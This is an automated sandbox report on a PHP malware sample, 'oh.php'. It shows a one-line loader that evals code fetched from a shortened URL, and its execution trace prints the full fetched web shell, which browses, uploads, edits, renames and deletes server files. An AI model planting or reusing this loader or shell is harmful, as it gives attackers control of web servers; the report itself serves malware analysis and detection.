PHP Malware Analysis
oh.php
md5: 90dc8156df1e7f86cb616f46f22e82c8
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
Execution
- eval (Deobfuscated, Original, Traces)
Files
- copy (Traces)
- file_get_contents (Deobfuscated, Original)
Input
Title
URLs
- http://zerobyte.id/ (HTML)
- https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js (HTML, Traces)
- https://bit.ly/3jhOwIp (Deobfuscated, Original, Traces)
- https://fonts.googleapis.com/css?family=VT323 (HTML, Traces)
- https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap (HTML, Traces)
- https://i.imgur.com/J5cDUtx.png (HTML, Traces)
- https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103& (HTML)
- https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&color=%23ff1493&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true (Traces)
Deobfuscated PHP code
<?php
echo eval("?>" . file_get_contents("https://bit.ly/3jhOwIp"));Execution traces
data/traces/90dc8156df1e7f86cb616f46f22e82c8_trace-1676251797.7344.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:30:23.632272]
1 0 1 0.000206 393464
1 3 0 0.000266 393432 {main} 1 /var/www/html/uploads/oh.php 0 0
2 4 0 0.000288 393432 file_get_contents 0 /var/www/html/uploads/oh.php 1 1 'https://bit.ly/3jhOwIp'
2 4 1 0.200093 410744
2 4 R '<?php\r\n\r\n/*\r\n 0 b y t 3 m 1 n 1 - 2.2\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n\r\n Recoded by xRyukZ \r\n Theme Zerotwo\r\n facebook.com/sawalrever\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-02";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x'
2 5 0 0.200475 464816 eval 1 '?><?php\r\n\r\n/*\r\n 0 b y t 3 m 1 n 1 - 2.2\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n\r\n Recoded by xRyukZ \r\n Theme Zerotwo\r\n facebook.com/sawalrever\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-02";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\n\r\nif (get_magic_quotes_gpc()) {\r\n foreach ($_POST as $key => $value) {\r\n $_POST[$key] = stripslashes($value);\r\n }\r\n}\r\n\r\necho \'<!DOCTYPE html><html>\r\n <head>\r\n <style>\r\n @import url(https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap);\r\n body {\r\n background: url(https://i.imgur.com/J5cDUtx.png) no-repeat center center fixed; \r\n background-size: cover;\r\n color:white;\r\n font-family: "Balsamiq Sans", cursive;\r\n margin:0;\r\n font-size: 14px; \r\n } \r\n h1 {\r\n font-family:"Balsamiq Sans", cursive;\r\n font-size:50px;\r\n margin:0; \r\n color:#FF1493;\r\n } \r\n h1:hover { \r\n color:#FF69B4;\r\n } \r\n select { \r\n background:white;\r\n color:black; \r\n }\r\n a { \r\n color:#FF1493;\r\n text-decoration:none;\r\n font-family:"Balsamiq Sans", cursive; \r\n } \r\n textarea { \r\n width:700px;\r\n height:300px;\r\n background:#FFB6C1;\r\n border:2px solid black;\r\n color:black;\r\n padding:5px;\r\n } \r\n tr:hover { \r\n background: #FFC0CB; } \r\n th { \r\n background:transparent;\r\n padding:3px; }\r\n </style>\r\n <meta name="robots" content"noindex. nofollow">\r\n <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n <title>\'.$sname.\'</title>\r\n <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n </head>\r\n <body>\';\r\n\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center>\' . $sname . \'</center></h1></div>\';\r\necho \'<iframe width="100%" height="20" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&color=%23ff1493&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>\';\r\nif (isset($_GET[\'path\'])) {\r\n $path = $_GET[\'path\'];\r\n chdir($_GET[\'path\']);\r\n} else {\r\n $path = $__gcdir();\r\n}\r\n$path = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<hr color="FF1493" style="margin-top:0;width:99%"><table width="100%" border="0" align="center" style="margin-top:0px;"><tr><td>\';\r\necho "<font color=\'#FF1493\' style=\'font-size:14px;\'>Theme By xRyukZ.";\r\necho "<br>";\r\necho "<font style=\'font-size:14px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n echo "<a style=\'font-size:14px;\' href=\'?path=";\r\n for ($i = 0; $i <= $id; $i++) {\r\n echo $paths[$i];\r\n if ($i != $id) {\r\n echo "/";\r\n }\r\n }\r\n echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="30%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:10px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n echo \'<center><font color="#00ff00">Upload OK!</font></center><br/>\';\r\n } else {\r\n echo \'<center><font color="red">Upload FAILED!</font></center><br/>\';\r\n }\r\n}\r\necho \'<hr color="FF1493" style="margin-top:0;width:99%;">\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n echo "" . basename($_GET[\'filesrc\']);\r\n "";\r\n echo \'</tr></td></table><br />\';\r\n echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n if ($_POST[\'opt\'] == \'rename\') {\r\n if (isset($_POST[\'newname\'])) {\r\n if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n }\r\n $_POST[\'name\'] = $_POST[\'newname\'];\r\n }\r\n echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n } elseif ($_POST[\'opt\'] == \'edit\') {\r\n if (isset($_POST[\'src\'])) {\r\n $fp = fopen($_POST[\'path\'], \'w\');\r\n if (fwrite($fp, $_POST[\'src\'])) {\r\n echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n }\r\n fclose($fp);\r\n }\r\n echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';\r\n }\r\n echo \'</center>\';\r\n} else {\r\n echo \'</table><br /><center>\';\r\n if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n if ($_POST[\'type\'] == \'dir\') {\r\n if ($rm__dir($_POST[\'path\'])) {\r\n echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n }\r\n } elseif ($_POST[\'type\'] == \'file\') {\r\n if ($un__link($_POST[\'path\'])) {\r\n echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n } else {\r\n echo \'<font color="red">Delete File Error.</font><br />\';\r\n }\r\n }\r\n }\r\n echo \'</center>\';\r\n $_scdir = $__scdir($path);\r\n echo \'<div id="content"><table width="80%" border="0" cellpadding="4" cellspacing="2" align="center"><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="20%"><center>Permissions</center></th> <th width="20%"><center>Last Update</center></th><th width="11%"><center>Actions</center></th></tr>\';\r\n foreach ($_scdir as $dir) {\r\n if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n continue;\r\n echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n if (is_writable("$path/$dir"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$dir"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$dir");\r\n if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\">\\" /></form></center></td></tr>";\r\n }\r\n foreach ($_scdir as $file) {\r\n if (!is_file("$path/$file"))\r\n continue;\r\n $size = filesize("$path/$file") / 1024;\r\n $size = round($size, 3);\r\n if ($size >= 1024) {\r\n $size = round($size / 1024, 2) . \' MB\';\r\n } else {\r\n $size = $size . \' KB\';\r\n }\r\n echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n if (is_writable("$path/$file"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$file"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$file");\r\n if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\">\\" /></form></center></td></tr>";\r\n }\r\n echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n $perms = fileperms($file);\r\n if (($perms & 0xC000) == 0xC000) {\r\n $info = \'s\';\r\n } elseif (($perms & 0xA000) == 0xA000) {\r\n $info = \'l\';\r\n } elseif (($perms & 0x8000) == 0x8000) {\r\n $info = \'-\';\r\n } elseif (($perms & 0x6000) == 0x6000) {\r\n $info = \'b\';\r\n } elseif (($perms & 0x4000) == 0x4000) {\r\n $info = \'d\';\r\n } elseif (($perms & 0x2000) == 0x2000) {\r\n $info = \'c\';\r\n } elseif (($perms & 0x1000) == 0x1000) {\r\n $info = \'p\';\r\n } else {\r\n $info = \'u\';\r\n }\r\n $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n return $info;\r\n}\r\necho \'<br><center>© <span id="footer"></span> 2020.</center><br>\';\r\necho \'<script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script>\';\r\necho \'</body></html>\';\r\n?>' /var/www/html/uploads/oh.php 1 0
3 6 0 0.200696 464816 set_time_limit 0 /var/www/html/uploads/oh.php(1) : eval()'d code 12 1 0
3 6 1 0.200715 464880
3 6 R FALSE
3 7 0 0.200729 464848 error_reporting 0 /var/www/html/uploads/oh.php(1) : eval()'d code 13 1 0
3 7 1 0.200743 464888
3 7 R 22527
3 8 0 0.200764 464848 error_log 0 /var/www/html/uploads/oh.php(1) : eval()'d code 14 1 0
3 8 1 0.200794 464880
3 8 R TRUE
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 16 $sname = '0byt3m1n1-02'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 17 $__gcdir = 'getcwd'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 18 $__fgetcon7s = 'file_get_contents'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 19 $__scdir = 'scandir'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 20 $rm__dir = 'rmdir'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 21 $un__link = 'unlink'
3 9 0 0.200873 464848 get_magic_quotes_gpc 0 /var/www/html/uploads/oh.php(1) : eval()'d code 23 0
3 9 1 0.200885 464848
3 9 R FALSE
3 10 0 0.200901 464848 getcwd 0 /var/www/html/uploads/oh.php(1) : eval()'d code 86 0
3 10 1 0.200915 464896
3 10 R '/var/www/html/uploads'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 86 $path = '/var/www/html/uploads'
3 11 0 0.200940 464896 str_replace 0 /var/www/html/uploads/oh.php(1) : eval()'d code 88 3 '\\' '/' '/var/www/html/uploads'
3 11 1 0.200955 464992
3 11 R '/var/www/html/uploads'
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 88 $path = '/var/www/html/uploads'
3 12 0 0.200979 464896 explode 0 /var/www/html/uploads/oh.php(1) : eval()'d code 89 2 '/' '/var/www/html/uploads'
3 12 1 0.200994 465472
3 12 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 89 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 94 $id = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 94 $id = 1
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 94 $id = 2
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 94 $id = 3
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 94 $id = 4
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i = 0
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 96 $i++
3 13 0 0.201338 465400 scandir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 162 1 '/var/www/html/uploads'
3 13 1 0.201382 466016
3 13 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'oh.php', 5 => 'prepend.php']
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 162 $_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'oh.php', 5 => 'prepend.php']
3 14 0 0.201439 466032 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/.'
3 14 1 0.201464 466096
3 14 R TRUE
3 15 0 0.201513 466064 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/..'
3 15 1 0.201529 466112
3 15 R TRUE
3 16 0 0.201548 466072 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/.htaccess'
3 16 1 0.201565 466112
3 16 R FALSE
3 17 0 0.201584 466072 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/data'
3 17 1 0.201614 466112
3 17 R TRUE
3 18 0 0.201627 466072 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 168 1 '/var/www/html/uploads/data'
3 18 1 0.201646 466112
3 18 R TRUE
3 19 0 0.201660 466072 perms 1 /var/www/html/uploads/oh.php(1) : eval()'d code 172 1 '/var/www/html/uploads/data'
4 20 0 0.201673 466072 fileperms 0 /var/www/html/uploads/oh.php(1) : eval()'d code 203 1 '/var/www/html/uploads/data'
4 20 1 0.201687 466112
4 20 R 16895
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 203 $perms = 16895
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 213 $info = 'd'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 221 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 222 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 223 $info .= 'x'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 224 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 225 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 226 $info .= 'x'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 227 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 228 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 229 $info .= 'x'
3 19 1 0.201809 466112
3 19 R 'drwxrwxrwx'
3 21 0 0.201823 466072 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 173 1 '/var/www/html/uploads/data'
3 21 1 0.201839 466112
3 21 R TRUE
3 22 0 0.201853 466072 filemtime 0 /var/www/html/uploads/oh.php(1) : eval()'d code 175 1 '/var/www/html/uploads/data'
3 22 1 0.201866 466112
3 22 R 1676251797
3 23 0 0.201879 466016 date 0 /var/www/html/uploads/oh.php(1) : eval()'d code 175 2 'd-M-Y H:i' 1676251797
3 23 1 0.201943 468408
3 23 R '12-Feb-2023 20:29'
3 24 0 0.201962 468136 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/oh.php'
3 24 1 0.201979 468176
3 24 R FALSE
3 25 0 0.201993 468144 is_dir 0 /var/www/html/uploads/oh.php(1) : eval()'d code 165 1 '/var/www/html/uploads/prepend.php'
3 25 1 0.202009 468192
3 25 R FALSE
3 26 0 0.202022 468136 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/.'
3 26 1 0.202038 468160
3 26 R FALSE
3 27 0 0.202051 468128 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/..'
3 27 1 0.202065 468176
3 27 R FALSE
3 28 0 0.202078 468136 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/.htaccess'
3 28 1 0.202093 468176
3 28 R TRUE
3 29 0 0.202106 468136 filesize 0 /var/www/html/uploads/oh.php(1) : eval()'d code 181 1 '/var/www/html/uploads/.htaccess'
3 29 1 0.202119 468176
3 29 R 64
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 181 $size = 0.0625
3 30 0 0.202143 468080 round 0 /var/www/html/uploads/oh.php(1) : eval()'d code 182 2 0.0625 3
3 30 1 0.202157 468152
3 30 R 0.063
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 182 $size = 0.063
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 186 $size = '0.063 KB'
3 31 0 0.202193 468176 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 189 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.202210 468216
3 31 R FALSE
3 32 0 0.202222 468176 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 191 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.202238 468216
3 32 R TRUE
3 33 0 0.202250 468176 perms 1 /var/www/html/uploads/oh.php(1) : eval()'d code 193 1 '/var/www/html/uploads/.htaccess'
4 34 0 0.202264 468176 fileperms 0 /var/www/html/uploads/oh.php(1) : eval()'d code 203 1 '/var/www/html/uploads/.htaccess'
4 34 1 0.202277 468216
4 34 R 33188
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 203 $perms = 33188
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 209 $info = '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 221 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 222 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 223 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 224 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 225 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 226 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 227 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 228 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 229 $info .= '-'
3 33 1 0.202402 468216
3 33 R '-rw-r--r--'
3 35 0 0.202415 468176 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/.htaccess'
3 35 1 0.202430 468216
3 35 R FALSE
3 36 0 0.202443 468176 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/.htaccess'
3 36 1 0.202458 468216
3 36 R TRUE
3 37 0 0.202471 468176 filemtime 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 1 '/var/www/html/uploads/.htaccess'
3 37 1 0.202484 468216
3 37 R 1676251797
3 38 0 0.202497 468120 date 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 2 'd-M-Y H:i' 1676251797
3 38 1 0.202527 468448
3 38 R '12-Feb-2023 20:29'
3 39 0 0.202549 468288 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/data'
3 39 1 0.202565 468328
3 39 R FALSE
3 40 0 0.202578 468288 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/oh.php'
3 40 1 0.202593 468328
3 40 R TRUE
3 41 0 0.202605 468288 filesize 0 /var/www/html/uploads/oh.php(1) : eval()'d code 181 1 '/var/www/html/uploads/oh.php'
3 41 1 0.202619 468328
3 41 R 61
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 181 $size = 0.0595703125
3 42 0 0.202642 468192 round 0 /var/www/html/uploads/oh.php(1) : eval()'d code 182 2 0.0595703125 3
3 42 1 0.202656 468264
3 42 R 0.06
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 182 $size = 0.06
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 186 $size = '0.06 KB'
3 43 0 0.202691 468280 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 189 1 '/var/www/html/uploads/oh.php'
3 43 1 0.202706 468320
3 43 R FALSE
3 44 0 0.202719 468280 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 191 1 '/var/www/html/uploads/oh.php'
3 44 1 0.202733 468320
3 44 R TRUE
3 45 0 0.202746 468280 perms 1 /var/www/html/uploads/oh.php(1) : eval()'d code 193 1 '/var/www/html/uploads/oh.php'
4 46 0 0.202786 468280 fileperms 0 /var/www/html/uploads/oh.php(1) : eval()'d code 203 1 '/var/www/html/uploads/oh.php'
4 46 1 0.202801 468320
4 46 R 33204
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 203 $perms = 33204
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 209 $info = '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 221 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 222 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 223 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 224 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 225 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 226 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 227 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 228 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 229 $info .= '-'
3 45 1 0.202936 468320
3 45 R '-rw-rw-r--'
3 47 0 0.202950 468280 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/oh.php'
3 47 1 0.202966 468320
3 47 R FALSE
3 48 0 0.202979 468280 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/oh.php'
3 48 1 0.202994 468320
3 48 R TRUE
3 49 0 0.203006 468280 filemtime 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 1 '/var/www/html/uploads/oh.php'
3 49 1 0.203019 468320
3 49 R 1676251797
3 50 0 0.203032 468224 date 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 2 'd-M-Y H:i' 1676251797
3 50 1 0.203067 468552
3 50 R '12-Feb-2023 20:29'
3 51 0 0.203083 468288 is_file 0 /var/www/html/uploads/oh.php(1) : eval()'d code 179 1 '/var/www/html/uploads/prepend.php'
3 51 1 0.203099 468336
3 51 R TRUE
3 52 0 0.203111 468296 filesize 0 /var/www/html/uploads/oh.php(1) : eval()'d code 181 1 '/var/www/html/uploads/prepend.php'
3 52 1 0.203125 468336
3 52 R 57
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 181 $size = 0.0556640625
3 53 0 0.203149 468200 round 0 /var/www/html/uploads/oh.php(1) : eval()'d code 182 2 0.0556640625 3
3 53 1 0.203162 468272
3 53 R 0.056
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 182 $size = 0.056
2 A /var/www/html/uploads/oh.php(1) : eval()'d code 186 $size = '0.056 KB'
3 54 0 0.203197 468304 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 189 1 '/var/www/html/uploads/prepend.php'
3 54 1 0.203213 468344
3 54 R FALSE
3 55 0 0.203226 468304 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 191 1 '/var/www/html/uploads/prepend.php'
3 55 1 0.203242 468344
3 55 R TRUE
3 56 0 0.203254 468304 perms 1 /var/www/html/uploads/oh.php(1) : eval()'d code 193 1 '/var/www/html/uploads/prepend.php'
4 57 0 0.203267 468304 fileperms 0 /var/www/html/uploads/oh.php(1) : eval()'d code 203 1 '/var/www/html/uploads/prepend.php'
4 57 1 0.203281 468344
4 57 R 33261
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 203 $perms = 33261
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 209 $info = '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 221 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 222 $info .= 'w'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 223 $info .= 'x'
